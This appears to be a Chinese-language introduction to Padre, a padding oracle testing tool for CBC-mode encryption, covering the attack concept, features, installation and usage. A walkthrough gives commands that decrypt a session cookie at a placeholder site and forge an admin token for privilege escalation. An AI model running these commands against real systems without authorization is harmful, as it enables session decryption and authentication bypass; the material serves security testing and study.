
關于Padre
Padre是一款功能強大的高級Padding Oracle安全測試工具,在該工具的幫助下,廣大研究人員可以輕松針對CBC模式加密執行Padding Oracle攻擊測試,以審查和測試目標加密模式的安全性。
關于Padding Oracle
Padding的含義是“填充”,在解密時,如果算法發現解密后得到的結果,它的填充方式不符合規則,那么表示輸入數據有問題,對于解密的類庫來說,往往便會拋出一個異常,提示Padding不正確。Oracle在這里便是“提示”的意思,和甲骨文公司沒有任何關系。
對于加密算法來說,它們是基于等長的“數據塊”進行操作的(如對于RC2,DES或TripleDES算法來說這個長度是8字節,而對于Rijndael算法來說則是16、24或32字節)。但是,我們的輸入數據長度是不規則的,因此必然需要進行“填充”才能形成完整的“塊”。
功能介紹
1、運行速度快,支持并行并發;
2、支持令牌解密;
3、支持加密任意數據;
4、Padding Oracle自動化指紋;
5、密碼塊長度自動化檢測;
6、如果在操作過程中出現錯誤故障,Padre將提供可行的解決方案建議;
7、支持GET/POST參數和Cookie中的令牌;
8、靈活的編碼規則與規范(Base64、Hex等);
Padding Oracle攻擊影響
1、泄露加密會話信息;
2、身份認證繞過;
3、提供服務器端信任的偽造令牌;
4、其他廣泛的攻擊面;
工具安裝
方便起見,廣大研究人員可以直接訪問該項目的【Releases頁面】下載對應操作系統版本的預編譯Padre代碼。
除此之外,我們也可以在本地設備上安裝并配置好Go語言環境,并使用源碼構建Padre:
go install github.com/glebarez/padre@latest
工具使用
Usage: padre [OPTIONS] [INPUT] INPUT: 解密模式:輸入加密數據 加密模式:輸入要加密的明文數據 如果不提供,則從STDIN讀取 NOTE: binary data is always encoded in HTTP. Tweak encoding rules if needed (see options: -e, -r) OPTIONS: -u *required* 目標URL,使用$字符定義令牌占位符 -enc 加密模式 -err 正則表達式模式,HTTP響應Body將于該正則表達式匹配以檢測Padding Oracle,不提供則執行自動化指紋檢測; -e 編碼二進制數據,支持的值有Base64和LHex,默認為Base64; -cookie 在HTTP請求中設置的Cookie值,使用$可標記令牌占位符; -post 執行POST請求的字符串數據,使用$可標記令牌占位符; -ct POST請求的Content-Type。如果不指定,工具將自動檢測Content-Type -b 密碼塊長度,不提供該參數則執行自動化檢測,支持的值有8、16、32,默認為16; -p 與目標服務器建立的并行HTTP連接數量 [1-256],默認為30; -proxy HTTP代理。例如use -proxy "http://localhost:8080"可使用Burp或ZAP做代理;
工具使用場景
如果我們找到了一個可疑的Padding Oracle,并且加密數據存儲在一個名為SESS的Cookie中,我們就可以使用下列命令來執行Padre:
padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='
如果確定了Padding Oracle上下文,那么Padre將會自動檢測HTTP響應指紋,如果服務器確實存在安全漏洞,工具將會把提供的令牌解密為下列形式:
{"user_id": 456, "is_admin": false}
這樣一來,我們就可以實現權限提升了。
我們還可以嘗試先生成我們自己的加密數據,然后解密回明文數據:
padre -u 'https://target.site/profile.php' -cookie 'SESS=$' -enc '{"user_id": 456, "is_admin": true}'
上述命令將生成另一個加密數據集,大致形式如下(Base64):
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
現在我們就可以打開瀏覽器,然后將SESS Cookie值設置成上面的加密數據,然后加載原始的Oracle頁面,你將會看到你的權限提升至了管理員權限。
工具使用演示

許可證協議
本項目的開發與發布遵循MIT開源許可證協議。
項目地址
Padre:【GitHub傳送門】
參考資料
https://blog.skullsecurity.org/2013/a-padding-oracle-example
https://blog.skullsecurity.org/2016/going-the-other-way-with-padding-oracles-encrypting-arbitrary-data
RacentYY
007bug
RacentYY
007bug
007bug
嘶吼專業版
RacentYY
安全俠
安全俠
007bug
X0_0X